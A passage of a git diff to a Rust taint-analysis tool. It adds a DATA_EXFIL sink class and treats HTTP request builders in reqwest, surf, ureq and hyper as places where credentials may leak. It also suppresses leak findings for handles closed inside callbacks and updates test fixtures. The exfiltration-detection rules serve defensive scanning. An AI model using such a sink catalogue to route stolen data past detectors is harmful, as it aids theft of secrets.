`body_bytes`) and terminal verbs + /// (`send`, `send_string`, `send_json`, `send_form`) are sinks for + /// `DATA_EXFIL` when receiver-typed. Distinct from `HttpClient` so + /// type-qualified resolution can attach builder-only rules without + /// over-firing on plain client objects. + RequestBuilder, /// A local, in-memory collection (HashMap, HashSet, Vec, etc.). /// The auth sink gate uses this so calls like `map.insert(...)` /// are treated as bookkeeping rather than cross-tenant sinks. No @@ -76,6 +85,7 @@ impl TypeKind { Self::DatabaseConnection => Some("DatabaseConnection"), Self::FileHandle => Some("FileHandle"), Self::Url => Some("URL"), + Self::RequestBuilder => Some("RequestBuilder"), _ => None, } } @@ -180,9 +190,10 @@ impl TypeFactResult { /// /// Suppression policy: /// * [`TypeKind::Int`] (and float, treated as numeric): suppresses -/// `SQL_QUERY`, `FILE_IO`, `SHELL_ESCAPE`, `HTML_ESCAPE`, `SSRF` , -/// numeric values cannot carry the metacharacters required to drive -/// any of these injection classes. +/// `SQL_QUERY`, `FILE_IO`, `SHELL_ESCAPE`, `HTML_ESCAPE`, `SSRF`, +/// `DATA_EXFIL`, numeric values cannot carry the metacharacters +/// required to drive any of these injection classes, nor can they +/// encode credentials/tokens that meaningfully constitute leakage. /// * [`TypeKind::Bool`]: suppresses every type-suppressible bit , /// `true`/`false` cannot carry a payload of any kind. pub fn is_type_safe_for_sink( @@ -191,8 +202,12 @@ pub fn is_type_safe_for_sink( type_facts: &TypeFactResult, ) -> bool { use crate::labels::Cap; - let type_suppressible = - Cap::SQL_QUERY | Cap::FILE_IO | Cap::SHELL_ESCAPE | Cap::HTML_ESCAPE | Cap::SSRF; + let type_suppressible = Cap::SQL_QUERY + | Cap::FILE_IO + | Cap::SHELL_ESCAPE + | Cap::HTML_ESCAPE + | Cap::SSRF + | Cap::DATA_EXFIL; if !sink_caps.intersects(type_suppressible) { return false; } @@ -224,6 +239,13 @@ pub(crate) fn constructor_type(lang: Lang, callee: &str) -> Option { "newHttpClient" | "newBuilder" if callee.contains("HttpClient") => { Some(TypeKind::HttpClient) } + // Apache HttpClient idiomatic factory: + // `CloseableHttpClient client = HttpClients.createDefault();` + // `HttpClients` contains the substring `HttpClient` so this + // doesn't widen to unrelated `createDefault` calls. + "createDefault" | "custom" if callee.contains("HttpClient") => { + Some(TypeKind::HttpClient) + } "OkHttpClient" | "WebClient" | "RestTemplate" => Some(TypeKind::HttpClient), "getConnection" => Some(TypeKind::DatabaseConnection), "MongoClient" => Some(TypeKind::DatabaseConnection), @@ -340,6 +362,10 @@ pub(crate) fn constructor_type(lang: Lang, callee: &str) -> Option { // so the auth sink gate recognises // `let x = factory_fn(); x.insert(..)`. Some(TypeKind::LocalCollection) + } else if is_rust_request_builder_constructor(base) { + // HTTP request-builder constructors across reqwest, surf, + // ureq, hyper. See [`is_rust_request_builder_constructor`]. + Some(TypeKind::RequestBuilder) } else { None } @@ -449,6 +475,54 @@ fn is_rust_local_collection_constructor(base: &str) -> bool { }) } +/// Does the peeled Rust callee correspond to a known HTTP request-builder +/// constructor / factory? Covers: +/// * surf free verbs (`surf::post`, `surf::get`, ...) , +/// * ureq free verbs (`ureq::post`, ...) , +/// * hyper `Request::builder` , +/// * reqwest `Client::post(url)` / `Client::get(url)` etc. (the `Client` +/// instance is itself an `HttpClient` but the verb call on it returns a +/// `RequestBuilder` whose chained methods bind body/json/form/etc.). +/// +/// reqwest's `Client::new` keeps its existing `HttpClient` mapping , +/// it produces the client, not a builder. +fn is_rust_request_builder_constructor(base: &str) -> bool { + // surf free verbs that return Request (acts as a builder). + const SURF_VERBS: &[&str] = &[ + "post", "get", "put", "delete", "patch", "head", "connect", "trace", + ]; + if SURF_VERBS + .iter() + .any(|v| base.ends_with(&format!("surf::{v}"))) + { + return true; + } + // ureq free verbs that return Request. + const UREQ_VERBS: &[&str] = &["post", "get", "put", "delete", "patch", "head"]; + if UREQ_VERBS + .iter() + .any(|v| base.ends_with(&format!("ureq::{v}"))) + { + return true; + } + // hyper request builder. + if base.ends_with("Request::builder") || base.ends_with("hyper::Request::builder") { + return true; + } + // reqwest Client verb-on-instance. `Client::post(url)` / + // `Client::get(url)` chained-form returns a RequestBuilder. We match + // the constructor-style segment used by chain text after CFG receiver + // collapse (`reqwest::Client::new.post`, `Client::post`, etc.). + const REQWEST_CLIENT_VERBS: &[&str] = + &["post", "get", "put", "delete", "patch", "head", "request"]; + if REQWEST_CLIENT_VERBS.iter().any(|v| { + base.ends_with(&format!("Client::new.{v}")) || base.ends_with(&format!("Client::{v}")) + }) { + return true; + } + false +} + pub fn is_identity_method(callee: &str) -> bool { let suffix = callee.rsplit(['.', ':']).next().unwrap_or(callee); matches!( @@ -1076,6 +1150,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let consts = HashMap::from([ @@ -1189,6 +1265,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let consts = HashMap::new(); @@ -1220,9 +1298,10 @@ mod tests { } /// Int-typed values must suppress every type-suppressible - /// cap, including the freshly-added `SSRF` bit. Numeric IDs - /// cannot rewrite a URL host, cannot form path traversal sequences, - /// cannot carry SQL/HTML/shell metacharacters. + /// cap, including the freshly-added `SSRF` and `DATA_EXFIL` bits. + /// Numeric IDs cannot rewrite a URL host, cannot form path + /// traversal sequences, cannot carry SQL/HTML/shell metacharacters, + /// and do not encode credentials worth exfiltrating. #[test] fn int_suppresses_every_type_suppressible_cap() { use crate::labels::Cap; @@ -1236,6 +1315,7 @@ mod tests { Cap::SHELL_ESCAPE, Cap::HTML_ESCAPE, Cap::SSRF, + Cap::DATA_EXFIL, ] { assert!( is_type_safe_for_sink(&[SsaValue(0)], cap, &result), @@ -1271,6 +1351,7 @@ mod tests { Cap::SHELL_ESCAPE, Cap::HTML_ESCAPE, Cap::SSRF, + Cap::DATA_EXFIL, ] { assert!( is_type_safe_for_sink(&[SsaValue(0)], cap, &result), @@ -1307,14 +1388,14 @@ mod tests { /// `is_type_safe_for_sink` requires an intentional matrix edit + a /// test update. Truth values: /// - /// | TypeKind | SQL | FILE | SHELL | HTML | SSRF | CODE_EXEC | DESERIALIZE | - /// |-----------|-----|------|-------|------|------|-----------|-------------| - /// | Int | Y | Y | Y | Y | Y | N | N | - /// | Bool | Y | Y | Y | Y | Y | N | N | - /// | String | N | N | N | N | N | N | N | - /// | Url | N | N | N | N | N | N | N | - /// | Object | N | N | N | N | N | N | N | - /// | Unknown | N | N | N | N | N | N | N | + /// | TypeKind | SQL | FILE | SHELL | HTML | SSRF | DATA_EXFIL | CODE_EXEC | DESERIALIZE | + /// |-----------|-----|------|-------|------|------|------------|-----------|-------------| + /// | Int | Y | Y | Y | Y | Y | Y | N | N | + /// | Bool | Y | Y | Y | Y | Y | Y | N | N | + /// | String | N | N | N | N | N | N | N | N | + /// | Url | N | N | N | N | N | N | N | N | + /// | Object | N | N | N | N | N | N | N | N | + /// | Unknown | N | N | N | N | N | N | N | N | #[test] fn type_kind_cap_suppression_matrix() { use crate::labels::Cap; @@ -1324,40 +1405,41 @@ mod tests { ("SHELL_ESCAPE", Cap::SHELL_ESCAPE), ("HTML_ESCAPE", Cap::HTML_ESCAPE), ("SSRF", Cap::SSRF), + ("DATA_EXFIL", Cap::DATA_EXFIL), ("CODE_EXEC", Cap::CODE_EXEC), ("DESERIALIZE", Cap::DESERIALIZE), ]; // (kind_name, kind, [suppress for each cap in `caps` order]) - let rows: &[(&str, TypeKind, [bool; 7])] = &[ + let rows: &[(&str, TypeKind, [bool; 8])] = &[ ( "Int", TypeKind::Int, - [true, true, true, true, true, false, false], + [true, true, true, true, true, true, false, false], ), ( "Bool", TypeKind::Bool, - [true, true, true, true, true, false, false], + [true, true, true, true, true, true, false, false], ), ( "String", TypeKind::String, - [false, false, false, false, false, false, false], + [false, false, false, false, false, false, false, false], ), ( "Url", TypeKind::Url, - [false, false, false, false, false, false, false], + [false, false, false, false, false, false, false, false], ), ( "Object", TypeKind::Object, - [false, false, false, false, false, false, false], + [false, false, false, false, false, false, false, false], ), ( "Unknown", TypeKind::Unknown, - [false, false, false, false, false, false, false], + [false, false, false, false, false, false, false, false], ), ]; for (kind_name, kind, expected) in rows { @@ -1389,6 +1471,7 @@ mod tests { Cap::SHELL_ESCAPE, Cap::HTML_ESCAPE, Cap::SSRF, + Cap::DATA_EXFIL, Cap::CODE_EXEC, Cap::DESERIALIZE, ] { @@ -1487,6 +1570,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let consts = HashMap::new(); diff --git a/src/state/facts.rs b/src/state/facts.rs index e9c91320..a5d5fa6a 100644 --- a/src/state/facts.rs +++ b/src/state/facts.rs @@ -19,19 +19,29 @@ fn sanitize_desc(s: &str) -> String { /// convergence node where all execution paths join before leaving the function. /// /// **Invariant:** Only terminal exits carry the complete merged lifecycle state -/// needed for leak analysis. Return nodes are intermediate (they flow into the -/// terminal exit) and must NOT be analyzed for terminal resource state. -/// -/// Detection is purely topological: a node inside a function is terminal when -/// it has no successor within the same function scope. This works for both -/// per-body graphs (Exit node is a sink) and legacy supergraphs (the -/// synthesized Return's successor is the file-level Exit with +/// needed for leak analysis. Return nodes are intermediate in per-body graphs +/// (they flow into the synthetic Exit node) but become terminal in legacy +/// supergraphs (their successor is the file-level Exit with /// `enclosing_func = None`). +/// +/// Detection combines a kind filter with a topological check. Only nodes +/// whose `StmtKind` actually terminates execution (`Exit`, `Return`, `Throw`) +/// are considered, then we require that they have no successor in the same +/// function scope. Without the kind filter, dangling Seq nodes left behind +/// when nested function literals (e.g. `obj.fn = () => {...}`) get a +/// placeholder in the parent graph would be misclassified as terminal exits +/// and produce spurious resource-leak findings at the function-literal span. fn is_terminal_function_exit( idx: petgraph::graph::NodeIndex, info: &crate::cfg::NodeInfo, cfg: &Cfg, ) -> bool { + if !matches!( + info.kind, + StmtKind::Exit | StmtKind::Return | StmtKind::Throw + ) { + return false; + } info.ast.enclosing_func.is_some() && !cfg .neighbors_directed(idx, petgraph::Direction::Outgoing) @@ -62,6 +72,7 @@ pub struct StateFinding { /// `state-unauthed-access` finding is suppressed on those spans because /// the user-controlled input has already been proved unable to escape /// into a privileged location. +#[allow(clippy::too_many_arguments)] pub fn extract_findings( result: &DataflowResult, cfg: &Cfg, @@ -70,6 +81,7 @@ pub fn extract_findings( func_summaries: &crate::cfg::FuncSummaries, enable_auth: bool, path_safe_suppressed_sink_spans: &std::collections::HashSet<(usize, usize)>, + closure_released_var_names: Option<&std::collections::HashSet>, ) -> Vec { let mut findings = Vec::new(); @@ -195,6 +207,23 @@ pub fn extract_findings( continue; } + // Suppress leaks for variables whose release call lives in a + // nested closure (callback / event handler) outside this + // body's CFG. Common JS/TS shape: + // const ws = new WebSocket(url); + // socket.on("close", () => ws.close()); + // The per-body resource analysis cannot observe the close + // inside the registered handler body; without this gate the + // handle reads as a definite leak. Match by variable name — + // closure-captured handles share the binding name with the + // handle in the outer scope. + if closure_released_var_names + .map(|s| s.contains(var_name)) + .unwrap_or(false) + { + continue; + } + // Prefer direct acquire node span; fall back to proxy span // from ResourceMethodSummary (cross-body resource tracking). let acquire_span = acquire_node @@ -557,6 +586,7 @@ mod tests { &HashMap::new(), false, &std::collections::HashSet::new(), + None, ); assert_eq!(findings.len(), 1); @@ -617,6 +647,7 @@ mod tests { &HashMap::new(), false, &std::collections::HashSet::new(), + None, ); assert!(findings.is_empty()); @@ -751,6 +782,7 @@ mod tests { &HashMap::new(), false, &std::collections::HashSet::new(), + None, ); assert!( @@ -816,6 +848,7 @@ mod tests { &HashMap::new(), false, &std::collections::HashSet::new(), + None, ); assert_eq!( diff --git a/src/state/mod.rs b/src/state/mod.rs index 20dc32cc..101611c2 100644 --- a/src/state/mod.rs +++ b/src/state/mod.rs @@ -77,6 +77,13 @@ pub fn run_state_analysis( // m.Lock()`) and routes them through `chain_proxies` instead. Pass // `None` to disable, strict-additive. ptr_proxy_hints: Option<&std::collections::HashMap>, + // Names of variables whose `.close()`/release calls live in a nested + // closure (event handler, deferred callback) that the per-body CFG + // can't observe directly. Used to suppress resource-leak findings + // for handles whose cleanup is registered as a callback (`ws.on( + // "close", () => ws2.close())`). Pass `None` for languages or + // shapes that don't need this. + closure_released_var_names: Option<&std::collections::HashSet>, ) -> Vec { let _span = tracing::debug_span!("run_state_analysis").entered(); @@ -116,9 +123,99 @@ pub fn run_state_analysis( func_summaries, enable_auth, path_safe_suppressed_sink_spans, + closure_released_var_names, ) } +/// Build a per-body map of variable names whose release calls +/// (`.close`, `.destroy`, `.end`, `.release`, …) appear inside a +/// **descendant** body (a closure / event handler nested inside the +/// body that opens the handle). +/// +/// Returned: `body_id → set of var names released somewhere inside +/// that body's nested-closure subtree`. Used by the structural +/// ResourceMisuse pass and the state-model leak pass to suppress +/// findings whose cleanup lives in a callback the per-body CFG can't +/// follow (`socket.on("close", () => ws.close())`). +/// +/// Restricted to descendants — sibling methods on the same class +/// don't share resource ownership, so a release in `queryAndClose` +/// must NOT silence a leak in sibling `queryAndLeak`. Only true +/// nested-closure parent / child relationships participate. +pub fn collect_closure_released_var_names( + bodies: &[crate::cfg::BodyCfg], + lang: Lang, +) -> std::collections::HashMap> { + use crate::cfg::{BodyId, StmtKind}; + use petgraph::visit::IntoNodeReferences; + + // Step 1: collect releases per body. Only nested (non-toplevel) + // closures are eligible — top-level bodies' own releases are + // already tracked by the dataflow. + let pairs = rules::resource_pairs(lang); + let mut per_body: std::collections::HashMap> = + std::collections::HashMap::new(); + for body in bodies { + if body.meta.parent_body_id.is_none() { + continue; + } + let mut local = std::collections::HashSet::new(); + for (_idx, info) in body.graph.node_references() { + if info.kind != StmtKind::Call { + continue; + } + let Some(callee) = info.call.callee.as_deref() else { + continue; + }; + let cl = callee.to_ascii_lowercase(); + let is_release = pairs.iter().any(|p| { + p.release.iter().any(|r| { + let rl = r.to_ascii_lowercase(); + if let Some(method) = rl.strip_prefix('.') { + cl.ends_with(&format!(".{method}")) + } else { + cl == rl || cl.ends_with(&format!(".{rl}")) + } + }) + }); + if !is_release { + continue; + } + if let Some(rcv) = info.call.receiver.as_deref() { + local.insert(rcv.to_string()); + } else if let Some((rcv, _)) = callee.rsplit_once('.') + && !rcv.is_empty() + { + local.insert(rcv.to_string()); + } + } + if !local.is_empty() { + per_body.insert(body.meta.id, local); + } + } + + // Step 2: roll up into ancestor bodies. Walk each non-top body's + // parent chain and union its release set into every ancestor's + // entry. Class methods at the same nesting level (siblings under a + // class body) do not roll up into each other — they have distinct + // BodyId entries and the chain only flows through `parent_body_id`. + let mut rollup: std::collections::HashMap> = + std::collections::HashMap::new(); + let by_id: std::collections::HashMap = + bodies.iter().map(|b| (b.meta.id, b)).collect(); + for body in bodies { + let Some(local) = per_body.get(&body.meta.id) else { + continue; + }; + let mut cur = body.meta.parent_body_id; + while let Some(pid) = cur { + rollup.entry(pid).or_default().extend(local.iter().cloned()); + cur = by_id.get(&pid).and_then(|b| b.meta.parent_body_id); + } + } + rollup +} + /// Build resource method summaries by pre-scanning all method bodies for known /// resource acquire/release operations. Only creates summaries for methods whose /// bodies actually contain matching operations, never infers from names alone. diff --git a/src/state/transfer.rs b/src/state/transfer.rs index 0b55c4cb..9c98512d 100644 --- a/src/state/transfer.rs +++ b/src/state/transfer.rs @@ -635,6 +635,19 @@ impl DefaultTransfer<'_> { fn apply_assignment(&self, _node_idx: NodeIndex, info: &NodeInfo, state: &mut ProductState) { // Ownership transfer: if `defines` reassigns a tracked resource // variable from a `uses` variable, transfer the lifecycle. + // + // Skip when the RHS is a function or lambda literal: storing a + // closure into a property (`ws.onclose = () => { ... }`, + // `obj.handler = function(){...}`) does not move ownership of the + // resources the closure body references — those identifiers appear + // in `info.taint.uses` only because `def_use` walks the literal's + // body, not because the assignment itself reads them. Without this + // gate, the first OPEN-tracked capture inside the closure body gets + // marked MOVED and the property's symbol becomes the new OPEN + // owner, which then surfaces as a spurious leak on the property. + if info.rhs_is_function_literal { + return; + } if let Some(ref def) = info.taint.defines && let Some(def_sym) = self.get_sym(info, def) { diff --git a/src/summary/ssa_summary.rs b/src/summary/ssa_summary.rs index 67e79348..142bf87c 100644 --- a/src/summary/ssa_summary.rs +++ b/src/summary/ssa_summary.rs @@ -158,6 +158,39 @@ pub struct SsaFuncSummary { /// (caller_param_index, sink_arg_position, sink_caps). #[serde(default)] pub param_to_sink_param: Vec<(usize, usize, Cap)>, + /// Per-parameter gate-filter cap masks lifted from inner multi-gate + /// sink call sites. + /// + /// When a function body contains a callee whose + /// [`crate::cfg::CallMeta::gate_filters`] carries more than one entry + /// (e.g. `fetch` is both an `SSRF` gate on the URL arg and a + /// `DATA_EXFIL` gate on the body arg), the multi-gate dispatch in + /// [`super::super::collect_block_events`] cap-narrows the event's + /// `sink_caps` to the specific gate's `label_caps`. Each + /// `(param_idx, label_caps)` entry records that this function's + /// parameter `param_idx` flowed into a gated sink whose narrowed + /// caps were `label_caps`. + /// + /// Cross-file callers consume this list to preserve per-position cap + /// attribution through wrapper functions: a wrapper + /// `fn forward(url, body) { fetch(url, {body}) }` records + /// `[(0, SSRF), (1, DATA_EXFIL)]` so a caller of `forward` splits + /// URL-tainted SSRF findings from body-tainted DATA_EXFIL findings + /// instead of conflating both caps onto every parameter. + /// + /// `Vec<(param_idx, label_caps)>` is sufficient at cross-file + /// granularity, the corresponding `payload_args` and + /// `destination_uses` are intra-file context that does not survive + /// the function-summary boundary (field idents reference SSA + /// values from the callee body). + /// + /// Empty (the default) for callees whose internal sinks carry zero + /// or one gate filter, the existing + /// [`Self::param_to_sink`] / + /// [`Self::param_to_sink_param`] machinery already records those + /// cases without per-position cap conflict. + #[serde(default, skip_serializing_if = "Vec::is_empty")] + pub param_to_gate_filters: Vec<(usize, Cap)>, /// Parameter indices whose container identity flows to the return value /// (e.g., function returns the same container it received as input). /// diff --git a/src/summary/tests.rs b/src/summary/tests.rs index 9b13dd23..6c3e6bed 100644 --- a/src/summary/tests.rs +++ b/src/summary/tests.rs @@ -441,6 +441,7 @@ fn ssa_summary_serde_round_trip_identity() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -473,6 +474,7 @@ fn ssa_summary_serde_round_trip_strip_bits() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -502,6 +504,7 @@ fn ssa_summary_serde_round_trip_add_bits() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -538,6 +541,7 @@ fn ssa_summary_serde_round_trip_all_variants() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -576,6 +580,7 @@ fn global_summaries_insert_ssa_exact_key_replacement() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; gs.insert_ssa(key.clone(), v1.clone()); assert_eq!(gs.get_ssa(&key), Some(&v1)); @@ -602,6 +607,7 @@ fn global_summaries_insert_ssa_exact_key_replacement() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; gs.insert_ssa(key.clone(), v2.clone()); assert_eq!(gs.get_ssa(&key), Some(&v2)); @@ -648,6 +654,7 @@ fn global_summaries_merge_with_ssa_entries() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let sum_b = SsaFuncSummary { param_to_return: vec![], @@ -670,6 +677,7 @@ fn global_summaries_merge_with_ssa_entries() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; gs1.insert_ssa(key_a.clone(), sum_a.clone()); @@ -716,6 +724,7 @@ fn global_summaries_is_empty_considers_ssa() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -745,6 +754,7 @@ fn ssa_summary_serde_round_trip_param_to_sink_param() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -789,6 +799,7 @@ fn ssa_summary_serde_round_trip_container_fields() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -843,6 +854,7 @@ fn ssa_summary_serde_round_trip_return_abstract() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -916,6 +928,8 @@ fn make_callee_body( exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }, opt: crate::ssa::OptimizeResult { const_values: std::collections::HashMap::new(), @@ -1361,6 +1375,7 @@ fn global_summaries_resolve_body_requires_body_present() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); // Don't insert body @@ -3504,6 +3519,7 @@ fn cf4_return_path_transform_serde_round_trip() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); diff --git a/src/symex/executor.rs b/src/symex/executor.rs index 479e04e9..96e8be85 100644 --- a/src/symex/executor.rs +++ b/src/symex/executor.rs @@ -1382,6 +1382,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let empty_succs = HashMap::new(); @@ -1441,6 +1443,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let empty_succs = HashMap::new(); @@ -1573,6 +1577,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = make_finding(n0, n1); @@ -1680,6 +1686,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; // Finding path goes through B0 → B1 → B3 @@ -1826,6 +1834,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { @@ -1938,6 +1948,8 @@ mod tests { exception_edges: vec![(b0, b2)], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let mut exc_succs: HashMap> = HashMap::new(); @@ -2004,6 +2016,8 @@ mod tests { exception_edges: vec![(b0, b2)], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let mut exc_succs: HashMap> = HashMap::new(); @@ -2111,6 +2125,8 @@ mod tests { exception_edges: vec![(b1, b2)], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { diff --git a/src/symex/loops.rs b/src/symex/loops.rs index 4534009d..652476b4 100644 --- a/src/symex/loops.rs +++ b/src/symex/loops.rs @@ -389,6 +389,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -434,6 +436,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -515,6 +519,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -577,6 +583,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -657,6 +665,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -728,6 +738,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -762,6 +774,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -818,6 +832,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -898,6 +914,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -976,6 +994,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -1011,6 +1031,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); diff --git a/src/symex/mod.rs b/src/symex/mod.rs index bcd0bf1c..1e3b0041 100644 --- a/src/symex/mod.rs +++ b/src/symex/mod.rs @@ -379,6 +379,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { @@ -452,6 +454,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { @@ -554,6 +558,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let ctx = SymexContext { @@ -614,6 +620,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let ctx = SymexContext { diff --git a/src/symex/state.rs b/src/symex/state.rs index bf10584a..4bb3a7a4 100644 --- a/src/symex/state.rs +++ b/src/symex/state.rs @@ -353,6 +353,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let witness = state.get_sink_witness(&finding, &ssa); @@ -393,6 +395,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; assert_eq!(state.get_sink_witness(&finding, &ssa), None); @@ -430,6 +434,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; assert_eq!(state.get_sink_witness(&finding, &ssa), None); @@ -470,6 +476,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; state.widen_at_loop_head(BlockId(0), &ssa); @@ -513,6 +521,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; state.widen_at_loop_head(BlockId(0), &ssa); @@ -556,6 +566,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: 